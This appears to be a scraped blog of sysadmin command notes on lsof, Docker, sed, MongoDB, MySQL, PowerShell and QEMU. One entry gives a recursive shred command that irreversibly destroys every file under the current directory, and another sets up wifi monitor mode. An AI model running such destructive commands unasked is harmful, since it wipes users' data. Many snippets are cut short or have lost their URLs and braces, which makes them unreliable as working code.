rsyslogd 488 syslog 1w REG 8,1 1151 268940 /var/log/syslog
rsyslogd 488 syslog 2w REG 8,1 2405 269616 /var/log/auth.log
console-k 144 root 9w REG 8,1 10871 269369 /var/log/ConsoleKit/history

4. List opened files based on process names starting with

You can list the files opened by process names starting with a string, using ‘-c’ option. -c followed by the process name will list the files opened by the process starting with that processes name. You can give multiple -c switch on a single command line.

# lsof -c ssh -c init
init 1 root txt REG 8,1 124704 917562 /sbin/init
init 1 root mem REG 8,1 1434180 1442625 /lib/i386-linux-gnu/
init 1 root mem REG 8,1 30684 1442694 /lib/i386-linux-gnu/
ssh-agent 1528 lakshmanan 1u CHR 1,3 0t0 4369 /dev/null
ssh-agent 1528 lakshmanan 2u CHR 1,3 0t0 4369 /dev/null
ssh-agent 1528 lakshmanan 3u unix 0xdf70e240 0t0 10464 /tmp/ssh-sUymKXxw1495/agent.1495

5. List processes using a mount point

Sometime when we try to umount a directory, the system will say “Device or Resource Busy” error. So we need to find out what are all the processes using the mount point and kill those processes to umount the directory. By using lsof we can find those processes.

# lsof /home

The following will also work.

# lsof +D /home/

6. List files opened by a specific user

In order to find the list of files opened by a specific users, use ‘-u’ option.

# lsof -u lakshmanan
update-no 1892 lakshmanan 20r FIFO 0,8 0t0 14536 pipe
update-no 1892 lakshmanan 21w FIFO 0,8 0t0 14536 pipe
bash 1995 lakshmanan cwd DIR 8,1 4096 393218 /home/lakshmanan

Sometimes you may want to list files opened by all users, expect some 1 or 2. In that case you can use the ‘^’ to exclude only the particular user as follows

# lsof -u ^lakshmanan
rtkit-dae 1380 rtkit 7u 0000 0,9 0 4360 anon_inode
udisks-da 1584 root cwd DIR 8,1 4096 2 /

The above command listed all the files opened by all users, expect user ‘lakshmanan’.

7. List all open files by a specific process

You can list all the files opened by a specific process using ‘-p’ option. It will be helpful sometimes to get more information about a specific process.

# lsof -p 1753
bash 1753 lakshmanan cwd DIR 8,1 4096 393571 /home/lakshmanan/test.txt
bash 1753 lakshmanan rtd DIR 8,1 4096 2 /
bash 1753 lakshmanan 255u CHR 136,0 0t0 3 /dev/pts/0

8. Kill all process that belongs to a particular user

When you want to kill all the processes which has files opened by a specific user, you can use ‘-t’ option to list output only the process id of the process, and pass it to kill as follows

# kill -9 `lsof -t -u lakshmanan`

The above command will kill all process belonging to user ‘lakshmanan’, which has files opened.

Similarly you can also use ‘-t’ in many ways. For example, to list process id of a process which opened /var/log/syslog can be done by

# lsof -t /var/log/syslog

Talking about kill, did you know that there are 4 Ways to Kill a Process?

9. Combine more list options using OR/AND

By default when you use more than one list option in lsof, they will be ORed. For example,

# lsof -u lakshmanan -c init
init 1 root cwd DIR 8,1 4096 2 /
init 1 root txt REG 8,1 124704 917562 /sbin/init
bash 1995 lakshmanan 2u CHR 136,2 0t0 5 /dev/pts/2
bash 1995 lakshmanan 255u CHR 136,2 0t0 5 /dev/pts/2

The above command uses two list options, ‘-u’ and ‘-c’. So the command will list process belongs to user ‘lakshmanan’ as well as process name starts with ‘init’.

But when you want to list a process belongs to user ‘lakshmanan’ and the process name starts with ‘init’, you can use ‘-a’ option.

# lsof -u lakshmanan -c init -a

The above command will not output anything, because there is no such process named ‘init’ belonging to user ‘lakshmanan’.

10. Execute lsof in repeat mode

lsof also support Repeat mode. It will first list files based on the given parameters, and delay for specified seconds and again list files based on the given parameters. It can be interrupted by a signal.

Repeat mode can be enabled by using ‘-r’ or ‘+r’. If ‘+r’ is used then, the repeat mode will end when no open files are found. ‘-r’ will continue to list,delay,list until a interrupt is given irrespective of files are opened or not.

Each cycle output will be separated by using ‘=======’. You also also specify the time delay as ‘-r’ | ‘+r’.

# lsof -u lakshmanan -c init -a -r5

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME 2971 lakshmanan cwd DIR 8,1 4096 393218 /home/lakshmanan 2971 lakshmanan rtd DIR 8,1 4096 2 / 2971 lakshmanan txt REG 8,1 83848 524315 /bin/dash 2971 lakshmanan mem REG 8,1 1434180 1442625 /lib/i386-linux-gnu/ 2971 lakshmanan mem REG 8,1 117960 1442612 /lib/i386-linux-gnu/ 2971 lakshmanan 0u CHR 136,4 0t0 7 /dev/pts/4 2971 lakshmanan 1u CHR 136,4 0t0 7 /dev/pts/4 2971 lakshmanan 2u CHR 136,4 0t0 7 /dev/pts/4 2971 lakshmanan 10r REG 8,1 20 393578 /home/lakshmanan/

In the above output, for the first 5 seconds, there is no output. After that a script named “” is started, and it list the output.

Finding Network Connection

Network connections are also files. So we can find information about them by using lsof.

11. List all network connections

You can list all the network connections opened by using ‘-i’ option.

# lsof -i
avahi-dae 515 avahi 13u IPv4 6848 0t0 UDP *:mdns
avahi-dae 515 avahi 16u IPv6 6851 0t0 UDP *:52060
cupsd 1075 root 5u IPv6 22512 0t0 TCP ip6-localhost:ipp (LISTEN)

You can also use ‘-i4’ or ‘-i6’ to list only ‘IPV4’ or ‘IPV6‘ respectively.

12. List all network files in use by a specific process

You can list all the network files which is being used by a process as follows

# lsof -i -a -p 234

You can also use the following

# lsof -i -a -c ssh

The above command will list the network files opened by the processes starting with ssh.

13. List processes which are listening on a particular port

You can list the processes which are listening on a particular port by using ‘-i’ with ‘:’ as follows

# lsof -i :25
exim4 2541 Debian-exim 3u IPv4 8677 TCP localhost:smtp (LISTEN)

14. List all TCP or UDP connections

You can list all the TCP or UDP connections by specifying the protocol using ‘-i’.

# lsof -i tcp; lsof -i udp;

15. List all Network File System ( NFS ) files

You can list all the NFS files by using ‘-N’ option. The following lsof command will list all NFS files used by user ‘lakshmanan’.

# lsof -N -u lakshmanan -a


Auteur : Harlok

2019-05-11 21:10:25

Docker start stop restart all containers

Restart all running containers :
docker restart $(docker ps -q)
docker restart $(docker ps -a -q)
Stop all running containers :
docker stop $(docker ps -q)
docker stop $(docker ps -a -q)
Restart all containers :
docker restart $(docker ps -a)
To start only stopped containers :
docker start $(docker ps -a -q -f status=exited)
Bash into the container :
docker exec -it container /bin/bash
docker exec -it container /bin/sh
Show lsof of a container :
lsof -U | grep containerid

Auteur : Harlok

2020-10-16 13:34:51

Reverse cat (concatenate) a Text File

From the tac manpage: tac – concatenate and print files in reverse

So, the next time you want to see the contents of a text file, but want to see the newest content first, tac is the command you need:

tac filename.log

Or, as you’ll probably need (to stop the output just flooding to the screen), you can pipe it to more, just as you can a normal cat.

tac filename.log | more

Auteur : Harlok

2019-04-05 15:20:43


grep exclude -v

tail -f access.log | grep -v ""

What this will do is show everything, apart from a line with that IP address in.

Of course, this works with any other command with text being piped into grep:

cat file.txt | grep -v "heh"

This would output the contents of file.txt but remove any lines with “heh” in them.

Exclude case from a grep to make it not case sensitive – simply add -i:

grep -i “Hello” textfile.txt

Alternatively, you could use it in conjunction with cat and tac (Reverse Cat)

cat textfile.txt | grep -i “Hello”

Auteur : Harlok

2019-04-05 15:24:14

After compiling php

Check extension dir

Check apache module

Auteur : Harlok

2019-04-03 10:27:38

How much data in MyISAM and InnoDB

SELECT IFNULL(B.engine,'Total') "Storage Engine",
CONCAT(LPAD(REPLACE(FORMAT(B.DSize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Data Size", CONCAT(LPAD(REPLACE(
FORMAT(B.ISize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Index Size", CONCAT(LPAD(REPLACE(
FORMAT(B.TSize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Table Size"
FROM (SELECT engine,SUM(data_length) DSize,SUM(index_length) ISize,
SUM(data_length+index_length) TSize FROM information_schema.tables
WHERE table_schema NOT IN ('mysql','information_schema','performance_schema')

Auteur : Harlok

2019-04-16 22:09:40

Some useful sed command

Remove all empty line:
sed '/^$/d'
In vim :

Remove or replace space and tabs:
sed 's/^[ \t]*//g'

Remove or replace all line return:
sed ':a;N;$!ba;s/\n//g'

Append a line after every line matching the pattern:
sed '/Sysadmin/a \ text' file

Insert Lines:
sed 'ADDRESS i\ text' file

Append at the end of line matching
sed 's/match.*/& text/' abcd.txt

Insert at the beginning:
sed 's/^/text/'

Append at the end:
sed 's/$/text/'

Remove the Ending char:
sed 's/.$//'

Remove ^M in vim :
With tr :
tr "\r" "\n"
And with sed :
sed -i -e 's/\r//g'

remove space at the beginning :
sed 's/^ *//g'

The following command deletes any trailing whitespace at the end of each line in vim :

Sed direcly in a file

Auteur : Harlok

2020-07-11 21:02:23

The tar linux command syntax

Tar Usage and Options

c – create a archive file.
x – extract a archive file.
v – show the progress of archive file.
f – filename of archive file.
t – viewing content of archive file.
j – filter archive through bzip2.
z – filter archive through gzip.
r – append or update files or directories to existing archive file.
W – Verify a archive file.
wildcards – Specify patterns in unix tar command.

examples :
- extract :
tar -xvf file.tar
- create :
tar -cvf archive.tar /path/tofile
- with compression :
tar -cvjf archive.tar.bz2 /path/tofile

Auteur : Harlok

2019-05-04 21:52:24

Shred Files

This command find all file from the current directory and subdirectories (-type f) and pipe (via xargs or -exec) it to shred (-n 48 48 iterations -z finish by zero -u remove file -v verbose -f force)
find . -type f -print0 | xargs -0 shred -fuzv -n 48
find . -type f -exec shred -fuzv -n 48 {} \;

Auteur : Harlok

2019-05-13 16:31:48

Commands - Mongodb

mongod --config "config.file"
mongod -f "config.file"

Status :
show dbs
load() Executes a specified javascript file.

auth :
mongo admin -u root -p
use admin

list users :
show users
db.createUser({"user": "ajitesh", "pwd": "gurukul", "roles": ["readWrite", "dbAdmin"]})

show roles :

list collections:
show collections
db..dataSize() // Size of the collection
db..storageSize() // Total size of document stored in the collection
db..totalSize() // Total size in bytes for both collection data and indexes
db..totalIndexSize() // Total size of all indexes in the collectio

User management commands :

Collection management commands :

Database management commands :

Database status command :

Creating index with Database Command :
{ "createIndexes": },
{ "indexes": [
"key": { "product": 1 }
{ "name": "name_index" }

Creating index with Shell Helper :
{ "product": 1 },
{ "name": "name_index" }

Introspect a Shell Helper :

Get the logging components:

mongo admin --host -u m103-admin -p m103-pass --eval '

Change the logging level:

mongo admin --host -u m103-admin -p m103-pass --eval '
db.setLogLevel(0, "index")

Tail the log file:

tail -f /data/db/mongod.log

Update a document:

mongo admin --host -u m103-admin -p m103-pass --eval '
db.products.update( { "sku" : 6902667 }, { $set : { "salePrice" : 39.99} } )

Look for instructions in the log file with grep:

grep -R 'update' /data/db/mongod.log


Adding other members to replica set :

Getting an overview of the replica set topology :

Stepping down the current primary :

Checking replica set overview after election :

Switch to config DB :
use config

Query config.databases:


Query config.collections:


Query config.shards:


Query config.chunks:


Query config.mongos:


Modifiy User multple Role :

var myuser = 'exemple';
var myre = /^exemple_dbs_.*/;
function(mydb) {
if (mydb['name'].match(myre)) {
db.grantRolesToUser(myuser, [ { role: "dbOwner", db: mydb['name'] } ] );

Modify a Role for Multiple Users

db.system.users.find({ "user": /^user_/ }).forEach(function(myuser) { db.grantRolesToUser(myuser["user"], [ { role: "dbOwner", db: "" } ] ); });

Profiling slow query
for a db:
use db
db.setProfilingLevel(0, { slowms: 150 })

for a complete instance :
mongod --profile 1 --slowms 15 --slowOpSampleRate 0.5

Auteur : Harlok

2020-03-20 09:05:15

Sed one liners

Find every file from the current folder and replace string :
find ./ -type f -exec sed -i 's/string1/string2/g' {} \;

Grep every file containing old-world string and replace string
grep -rl matchstring somedir/ | xargs sed -i 's/string1/string2/g'

grep every file recursively from the current folder wich contains the word foo but not with filename bar and replace string
grep -rl foo . | grep -v bar | xargs sed -i 's/string1/string2/g'

Auteur : Harlok

2020-10-13 23:00:57

awk commands

awk '{total+=$2} END {print total}'

Auteur : Harlok

2018-12-14 14:02:13

Identifying MySQL Slow Queries

One of the most important steps in optimizing and tuning mysql is to identify the queries that are causing problems. How can we find out what queries are taking a long time to complete? How can we see what queries are slowing down the mysql server? Mysql has the answer for us and we only need to know where to look for it… Normally from my experience if we take the most ‘expensive’ 10 queries and we optimize them properly (maybe running them more efficiently, or maybe they are just missing a simple index to perform properly), then we will immediately see the result on the overall mysql performance. Then we can iterate this process and optimize the new top 10 queries. This article shows how to identify those ‘slow’ queries that need special attention and proper optimization.
1. Activate the logging of mysql slow queries.

The first step is to make sure that the mysql server will log ‘slow’ queries and to properly configure what we are considering as a slow query.

First let’s check on the mysql server if we have slow query logging enabled:

mysqladmin var |grep log_slow_queries
| log_slow_queries | OFF |

If log_slow_queries is ON then we already have it enabled. This setting is by default disabled – meaning that if you don’t have log_slow_queries defined in the mysql server config this will be disabled. The mysql variable long_query_time (default 1) defines what is considered as a slow query. In the default case, any query that takes more than 1 second will be considered a slow query.

Ok, now for the scope of this article we will enable the mysql slow query log. In order to do to do this in your mysql server config file (/etc/my.cnf RHEL/Centos or /etc/mysql/my.cnf on Debian, etc.) in the mysqld section we will add:

long_query_time = 1
log-slow-queries = /var/log/mysql/mysql-slow.log

This configuration will log all queries that take more than 1 sec in the file /var/log/mysql/mysql-slow.log. You will probably want to define these based on your particular setup (maybe you will want the logs in a different location and/or you will consider a higher value than 1 sec to be slow query).

Once you have done the proper configurations to enable mysql to log slow queries you will have to reload the mysql service in order to activate the changes.
2. Investigate the mysql slow queries log.

After we enabled slow query logging we can look inside the log file for each slow query that was executed by the server. Various details are logged to help us understand how was the query executed:

Time: how long it took to execute the query
Lock: how long was a lock required
Rows: how many rows were investigated by the query (this can help see quickly queries without indexes)
Host: the actual host that launched the query (this can be localhost, or a different one in multiple servers setup)
The actual mysql query.

This information allows us to see what queries need to be optimized, but on a high traffic server and with lots of slow queries this log can grow up very fast making it very difficult to find any relevant information inside it. In this case we have two choices:

We increase the long_query_time and we focus on the queries that take the most time to complete, and we gradually decrease this once we solve the queries.
We use some sort of tool to parse the slow query log file and have it show us the most used queries.

Of course based on the particular setup we might end up using both methods.

MySQL gives us a small tool that does exactly this: mysqldumpslow. This parses and summarizes the MySQL slow query log. From the manual page here are the options we can use:

-v verbose
-d debug
what to sort by (t, at, l, al, r, ar etc)
-r reverse the sort order (largest last instead of first)
just show the top n queries
-a don't abstract all numbers to N and strings to 'S'
abstract numbers with at least n digits within names
grep: only consider stmts that include this string
hostname of db server for *-slow.log filename (can be wildcard)
name of server instance (if using mysql.server startup script)
-l don't subtract lock time from total time

For example using:

mysqldumpslow -s c -t 10

we get the top 10 queries (-t 10) sorted by the number of occurrences in the log (-s c). Now it is time to have those queries optimized. This is outside of the scope of this article but the next logical step is to run EXPLAIN on the mysql query and then, based on the particular query to take the appropriate actions to fix it.

Auteur : Harlok

2019-04-16 22:09:27


mysqldumpslow -s c -t 10 /var/log/mysql_slow_queries.log

mysqldumpslow – Summarize slow query log files

mysqldumpslow [options] [log_file …]

The MySQL slow query log contains information about queries that take a long time to execute (see Section 5.2.5, “The Slow Query Log”).
mysqldumpslow parses MySQL slow query log files and prints a summary of their contents.

Normally, mysqldumpslow groups queries that are similar except for the particular values of number and string data values. It “abstracts” these values to N and ‘S’ when displaying summary output. The -a and -n options can be used to modify value abstracting behavior.

Invoke mysqldumpslow like this:

shell> mysqldumpslow [options] [log_file ...]

mysqldumpslow supports the following options.

· –help

Display a help message and exit.

· -a

Do not abstract all numbers to N and strings to ‘S’.

· –debug, -d

Run in debug mode.

· -g pattern

Consider only queries that match the (grep-style) pattern.

· -h host_name

Host name of MySQL server for *-slow.log file name. The value can contain a wildcard. The default is * (match all).

· -i name

Name of server instance (if using mysql.server startup script).

· -l

Do not subtract lock time from total time.

· -n N

Abstract numbers with at least N digits within names.

· -r

Reverse the sort order.

· -s sort_type

How to sort the output. The value of sort_type should be chosen from the following list:

· t, at: Sort by query time or average query time

· l, al: Sort by lock time or average lock time

· r, ar: Sort by rows sent or average rows sent

· c: Sort by count

By default, mysqldumpslow sorts by average query time (equivalent to -s at).

· -t N

Display only the first N queries in the output.

· –verbose, -v

Verbose mode. Print more information about what the program does.

Auteur : Harlok

2019-04-16 22:09:06

php errors

ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);

Auteur : Harlok

2018-11-22 08:49:52

Wifi commands

list [id|type ...]
List the current state of all available devices. The command output format is
deprecated, see the section DESCRIPTION. It is a good idea to check with list
command id or type scope is appropriate before setting block or unblock. Special
all type string will match everything. Use of multiple id or type arguments is

block id|type [...]
Disable the corresponding device.

unblock id|type [...]
Enable the corresponding device. If the device is hard-blocked, for example via a
hardware switch, it will remain unavailable though it is now soft-unblocked.

iw dev
iw phy phy0 info
iw phy phy0 interface add mon0 type monitor
iw dev wlan0 del
ifconfig mon0 up

Auteur : Harlok

2018-10-05 09:44:37

Kali nethunter invalid key

wget -q -O - | apt-key add

Auteur : Harlok

2018-09-27 19:20:32

Ten Ps commands

Computer running Windows Vista (or higher)
Server running Windows Server 2008 (or higher)
PowerShell 5.0
Administrative access
1: Create a PowerShell session
Command: Enter-PSSession

Example: Enter-PSSession -ComputerName REMOTE_COMPUTER_NAME -Credential USERNAME

Creating a PSSession will allow an administrator to remotely connect to a computer on the network and run any number of PS commands on the device. During the session, multiple commands may be executed remotely, since the admin has console access just as though he/she were sitting locally at the machine.

2: Execute commands

Command: Invoke-Command

Example: Invoke-Command -Computer REMOTE_COMPUTER_NAME -ScriptBlock {PowerShell Command}

Figure D
Using Invoke-Command in PS renders similar results to executing a session as in command #1 above, except that when using Invoke to call forth a command remotely, only one command may be executed at a time. This prevents running multiple commands together unless they are saved as a .PS1 file and the script itself is invoked.

3: Restart computer(s)
Command: Restart-Computer

Example: Restart-Computer -ComputerName REMOTE_COMPUTER_NAME -Force

Sometimes installations or configurations will require a reboot to work properly. Other times, a computer just needs a refreshing of the resources, and a reboot will accomplish that. Whether targeted at one or one hundred devices, PS can ease the job with just one command for all.

4: Ping computer(s)
Command: Test-Connection


The PING command is one of the most useful commands in a sysadmin's arsenal. Simply put, it tests connectivity between your current station and another remote system. Test-Connection brings it up a notch by folding that functionality into a PS cmdlet, while adding some new tricks—such as being able to designate a source computer that's different from the one you're currently logged onto. Say you need to test communications between a server and a remote device. The ICMP requests will be sent from the server to the remote device, yet report the findings back to your admin station.

5: View and modify services
Command: Set-Service


Services are resilient and sometimes finicky. Depending on what's going on with a particular computer, they may halt at the worst possible time. Determining a station's running services begins with the Get-Service cmdlet to obtain current statuses. Once that information is available, the process to set a service status is possible - be it for one service, those that begin with the letter W, or all of them at once.

6: Run background tasks
Command: Start-Job

Example: Start-Job -FilePath PATH_TO_SCRIPT.PS1

Some administrators do what they need to do when they need to do it, regardless of what's going on or what the users are doing. Others prefer to work in the shadows to keep things humming along with little to no interruptions. If you're one of the latter, this cmdlet is perfect for your management style.

It executes scripts or tasks in the background no matter who is interactively logged on or what they may be doing. Further, it will execute silently—even if it were to fail—and not interrupt the locally logged on user at all. Like a ghost!

7: Shut down computer(s)
Command: Stop-Computer

Example: Stop-Computer -ComputerName REMOTE_COMPUTER_NAME -Force

Unlike running things silently or rebooting a desktop from afar, there are times when computers need to be shut down. For these moments, this cmdlet will ensure that one or all computers are properly shut down and will even log off interactive users if the -Force argument is included.

8: Join computers to a domain
Command: Add-Computer

Example: Add-Computer -ComputerName COMPUTER_NAMES_TO_BE_JOINED -DomainName DOMAIN.COM -Credential DOMAIN\USER -Restart

While the process of joining a computer to a domain is fairly straightforward, the three clicks and entering of admin credentials can become quite tedious when multiplied by several hundreds of computers at a time.

PowerShell can make short work of the task. This cmdlet allows for multiple computers at once to be joined to a domain, while requiring the admin to enter his/her credentials only once.

9: Manage other applications and services
Command: Import-Module

Example: Import-Module -Name NAME_OF_POWERSHELL_MODULE

One of PowerShell's greatest benefits is its flexibility when it comes to managing just about anything—from Windows-based computing systems to applications like Microsoft Exchange. Some applications and system-level services permit only a certain level of management via GUI. The rest is defaulted to PS, so Microsoft is clearly leveraging the technology significantly.

This is accomplished through the use of modules that contain the necessary codebase to run any number of additional cmdlets within PowerShell that target a specific service or application. Modules may be used only when needed by importing them, at which point they will extend the PS functionality to a specific service or app. Once your work is done, you can remove the module from the active session without closing it altogether.

10: Rename computers
Command: Rename-Computer

Example: Rename-Computer -NewName NEW_COMPUTER_NAME -LocalCredential COMPUTERNAME\USER -Restart

Depending on several factors, including the deployment system used, scripting experience level and security, and company policy, computers being renamed might not be done regularly (or perhaps it's a task performed quite often). Either way, the Rename cmdlet is extremely useful when working on one or multiple systems—workgroup or on a domain.

The cmdlet will rename a device and reboot it so that the changes can take effect. For those on a domain, the added benefit will be that if the Active Directory Schema supports it, the new computer will also result in a computer object rename within AD. The object will retain all its settings and domain joined status but will reflect the new name without any significant downtime to the user outside of a reboot

Auteur : Harlok

2018-09-27 19:19:15

Switch radeon GPU

Switch Radeon GPU: Restart GPUs and switch Polaris Compute Mode, Vega HBCC Memory and Large Pages
Updated on June 6th, 2018 to version 0.9.5

Switch Radeon GPU is a simple command line tool for restarting Radeon based GPUs. It can switch Polaris based GPUs (RX 470/480/570/580) from ‘Graphics Mode’ into ‘Compute Mode’. It also can toggle low level options of Radeon Vega GPUs like HBCC Memory and Large Pages support.

Switch Radeon GPU was developed as part of Cast XMR CryptoNight Miner but could be useful for handling Radeon GPUs for all sorts of workloads in OpenCL compute mode.

Make restarting your Radeon based GPU a breeze:

Switch Radeon GPU 0.9.5 for Windows (64 bit)
Restarts Radeon GPUs
Switch ‘Compute Mode’ on or off (only RX 470/RX 480/RX 570/RX 580)
Switch ‘HBCC Memory’ on or off (only Vega GPUs)
Switch ‘Large Pages’ on or off (only Vega GPUs)
Windows 8/8.1/10 64 bit
AMD Radeon RX Vega 56/64 GPU
or AMD Radeon Vega Frontier Edition GPU
or AMD Radeon RX 480/RX 580 GPU
or AMD Radeon RX 470/RX 570 GPU
Radeon Driver 17.1.1 or later for restarting GPUs
Radeon Driver 18.1.1 or later for switching modes
How To
switch-radeon-gpu has a command line interface:

switch-radeon-gpu [-G 0,..,N] [options] [restart|autorestart|fullrestart]

Executing switch-radeon-gpu without any arguments will list all installed Radeon GPUs and their status.

To select which GPU to operate on use the -G switch, e.g. for restarting the 2nd card use:

switch-radeon-gpu -G 1 restart

To select multiple GPUs use the -G switch and list comma separated the GPUs which should be used, e.g. for restarting the 1st and 3rd card use:

switch-radeon-gpu -G 0,2 restart

There are different restart modes:

restart fast restart the specified GPU, the AMD Radeon Settings will sometimes not pick up the configuration changes and display the old state
autorestart only restart the GPU if necessary due to a change in configuration
fullrestart a more sustained restart of the GPU, also the AMD Radeon Settings app wil restart
If no GPU is specified with the -G option all available GPUs will be restarted!

Following options of the GPU can be switched:

--compute =on switch the GPU based in ‘Compute Mode’ =off switch to ‘Graphics Mode’ (Polaris only)
--hbcc switch HBCC =on or =off (Vega only)
--largepages switch large page support =on or =off (Vega only). Most usefull for Vega Frontier Edition to better utilize the available 16 GB memory
For example switch all Polaris based GPUs to Compute Mode:

switch-radeon-gpu --compute=on autorestart

To turn HBCC Memory option for all Vega based GPUs to off:

switch-radeon-gpu --hbcc=off autorestart

To toggle Large Pages only for the 1st GPU to on:

switch-radeon-gpu -G 0 --largepages=on restart

For a complete list of configuration options run:

switch-radeon-gpu --help

Here's the soft for windows :

Auteur : Harlok

2019-10-03 14:35:10

VM (QEMU) screen resolution change

The default resolution in most XenCenter VMs are crap. Trying to work with 800x600 resolution is like looking through a submarine porthole. Let's increase the resolution of the VM:

sudo apt-get install xvfb xfonts-100dpi xfonts-75dpi xfstt
sudo nano /etc/default/grub

Press CTRL+W to search for the string below:


Set the line to the following. You can change the resolutions below to suit your preferred order. The first entry will be used on default. Don't forget you can set it pretty high and then just click the "scale" option in the console window of XenCenter.


The add this underneath that line:


Save the config file with CTRL+X and select "Y" to confirm changes.

Update Grub:
sudo update-grub

Now reboot once the updates are all finished installing.

Auteur : Harlok

2019-04-16 22:16:15

qemu vnc

qemu-kvm [...] -vnc :5,password -monitor stdio

Starts the VM Guest graphical output on VNC display number 5 (usually port 5905). The password suboption initializes a simple password-based authentication method. There is no password set by default and you have to set one with the change vnc password command in QEMU monitor:

QEMU 0.12.5 monitor - type 'help' for more information
(qemu) change vnc password
Password: ****

Auteur : Harlok

2019-04-16 22:15:51

qemu: Set or force higher screen resolution

cvt 1024 768 60

this should output something like:

# 1024x768 59.92 Hz (CVT 0.79M3) hsync: 47.82 kHz; pclk: 63.50 MHz
Modeline "1024x768_60.00" 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync

Copy everything on the second line (the one that starts with 'modeline') except for the word 'modeline' itself. So you'd copy

"1024x768_60.00" 63.50 1024 1072 1176 1328 768 771 775 798

Then, type xrandr --newmode and paste after that. So it'd look like:

xrandr --newmode "1024x768_60.00" 63.50 1024 1072 1176 1328 768 771 775 798

If this fails, I will need to know how it fails, but it denotes some problem I am not aware of. It should work with any standard (VESA) resolution - no, 1366x768 is not a VESA standard and may fail. 1024x768 is a good one to try, as are 1280x1024, 1900x1200, 1920x1080, and many others. 1360x768 is compliant with the standard as well.

If it worked, now type xrandr without any arguments and you'll get a list of available displays. It may list multiple displays - you want to select one that says connected , such as

VGA1 connected 1600x900+1280+0 (normal left inverted right x axis y axis) 443mm x 249mm

Yours may be labeled differently, and will probably read 640x480 instead.

Take the first word (in my case VGA1) and copy it. Now type 'xrandr --addmode "output name" "the part in quotes from the modeline you calculated earlier, with quotes removed" '

such as:

xrandr --addmode VGA1 1024x768_60.00

If this succeeds, you can set the display mode from the UI (probably), or if that fails by typing

xrandr --output VGA1 --mode 1024x768_60.00

(substituting your values, of course)

To make these survive reboot you can either run the xrandr stuff at startup (make sure it returns zero if you put it in for example your display manager setup scripts, otherwise things changing between boots could cause your DM to hang or constantly restart!), or you can put something in xorg.conf or xorg.conf.d:

Section "Device"
Identifier "Configured Video Device"
Driver "vesa"

Section "Monitor"
Identifier "Configured Monitor"
HorizSync 42.0 - 52.0
VertRefresh 55.0 - 65.0
Modeline "1024x768" 60.80 1024 1056 1128 1272 768 768 770 796
Modeline "800x600" 38.21 800 832 976 1008 600 612 618 631
Modeline "640x480" 24.11 640 672 760 792 480 490 495 50

Section "Screen"
Identifier "Default Screen"
Monitor "Configured Monitor"
Device "Configured Video Device"
DefaultDepth 24
Subsection "Display"
Depth 24
Modes "1024x768" "800x600" "640x480"

Auteur : Harlok

2019-04-16 22:16:04

string to hex php

function strToHex($string){
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
return $hex;

function hexToStr($hex){
for ($i=0; $i < strlen($hex)-1; $i+=2){
$string .= chr(hexdec($hex[$i].$hex[$i+1]));
return $string;

function strhex($string) {
$hexstr = unpack('H*', $string);
return array_shift($hexstr);


Code below what you need

function strtohex($string)
$string = str_split($string);
foreach($string as &$char)
$char = "\x".dechex(ord($char));
return implode('',$string);

print strtohex("[0-9A-Za-z\+/=]*");

Auteur : Harlok

2020-06-28 20:34:11

Powershell command

get checksum:
Get-FileHash -Algorithm MD5

download a file:
method 1:
$url = ""
$output = "$PSScriptRoot\10meg.test"
$start_time = Get-Date

Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"

method 2:
$url = ""
$output = "$PSScriptRoot\10meg.test"
$start_time = Get-Date

$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
(New-Object System.Net.WebClient).DownloadFile($url, $output)

Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)"

$client = new-object System.Net.WebClient
It works as well with GET queries.

If you need to specify credentials to download the file, add the following line in between:

$client.Credentials = Get-Credential

$computer = gc env:computername


$service = get-wmiObject -query "select * from SoftwareLicensingService" -computername $computer



Use the SC (service control) command, it gives you a lot more options than just start & stop.

SC is a command line program used for communicating with the
NT Service Controller and services.
sc [command] [service name] ...

The option has the form "\\ServerName"
Further help on commands can be obtained by typing: "sc [command]"
query-----------Queries the status for a service, or
enumerates the status for types of services.
queryex---------Queries the extended status for a service, or
enumerates the status for types of services.
start-----------Starts a service.
pause-----------Sends a PAUSE control request to a service.
interrogate-----Sends an INTERROGATE control request to a service.
continue--------Sends a CONTINUE control request to a service.
stop------------Sends a STOP request to a service.
config----------Changes the configuration of a service (persistant).
description-----Changes the description of a service.
failure---------Changes the actions taken by a service upon failure.
qc--------------Queries the configuration information for a service.
qdescription----Queries the description for a service.
qfailure--------Queries the actions taken by a service upon failure.
delete----------Deletes a service (from the registry).
create----------Creates a service. (adds it to the registry).
control---------Sends a control to a service.
sdshow----------Displays a service's security descriptor.
sdset-----------Sets a service's security descriptor.
GetDisplayName--Gets the DisplayName for a service.
GetKeyName------Gets the ServiceKeyName for a service.
EnumDepend------Enumerates Service Dependencies.

The following commands don't require a service name:

Auteur : Harlok

2018-09-27 19:13:18

Unmount son root sans reboot (FR)

Vous avez jamais voulu démonter la partition racine de votre ptit nunux ? Non ? Pourquoi faire ?! Bhaa je sais pas moi, par exemple faire des opérations sur votre partition racine (redimensionner/changer le filesystem/réparer le fs). Sauf que bon en temps normal vous ne pouvez pas démonter la partition racine puisque votre OS est sur cette partition.

Par chance, nous vivons dans une époque merveilleuse où l’on possède tous pas mal de Giga de ram ce qui rend l’opération possible et même assez simple. Allez on y va !

Couper tout ce qui tourne
Pour pouvoir démonter votre partoche il va falloir couper tous les processus faisant des accès disques (lsof va être votre ami). Cette étape peut être faite au tout dernier moment avant le grand saut pour impacter le moins possible l’uptime de vos services.

Si vous avez suffisamment de ram vous pouvez même vous débrouiller pour ne pas couper ou juste relancer les processes mais c’est un poil plus touchy. Surtout si vous avez des données qui sont susceptibles d’être modifiées pendant que ça tourne.

Recréer son userland en ram
Bon donc le but du jeu ça va être de se créer une partition racine mais dans la ram. Donc déjà première étape, on se créer un point de montage mkdir /ramroot et ensuite on y monte du tmpfs avec mount -t tmpfs none /ramroot .

Là ça y est, tout ce que vous collerez dans /ramroot ne sera pas sur votre skeudur mais dans votre ram.

